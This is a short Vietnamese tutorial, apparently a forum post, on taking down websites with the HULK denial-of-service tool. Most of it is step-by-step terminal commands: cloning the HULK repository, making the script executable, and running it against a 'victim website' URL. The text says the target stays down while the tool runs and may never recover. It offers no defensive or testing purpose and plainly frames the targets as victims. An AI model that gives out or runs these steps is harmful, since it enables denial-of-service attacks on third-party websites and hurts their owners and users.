Tools này sử dụng Hack các website có Hosting mạnh

Attention: Bạn chỉ có thể vô hiệu hóa website nạn nhân khi tools này vẫn đang chạy,và khi bạn tắt tools này đi thì website nạn nhân có thể phục hồi lại(cá biệt có những trường hợp tự phục hồi lâu hoặc không thể phục hồi).

ta vào Terminal hoặc Termux và gõ các lệnh như sau,sau khi ta đã cài các gói cơ bản xong:

#git clone https://github.com/grafov/hulk

#ls    (có file hulk là Ok)

#cd hulk

#ls      (có file hulk.py là Ok)

#chmod +x hulk.py     (ta cấp quyền hoạt động cho gói hulk.py)

#python2 hulk.py https://www.abcd.com.vn/      (tên website này là tên website nạn nhân)

>> Chờ nó load các zombie truy cập tấn công website mục tiêu là xong,trong lúc mới bắt đầu vào tools nếu mà nó load rất lâu thì là đúng,tools hoạt động tốt,còn nếu mới khởi chạy tools mà nó load nhanh liền thì có nhiều khả năng kết nối với zombie truy cập thất bại.

 

Code Verify: 4zvxnx1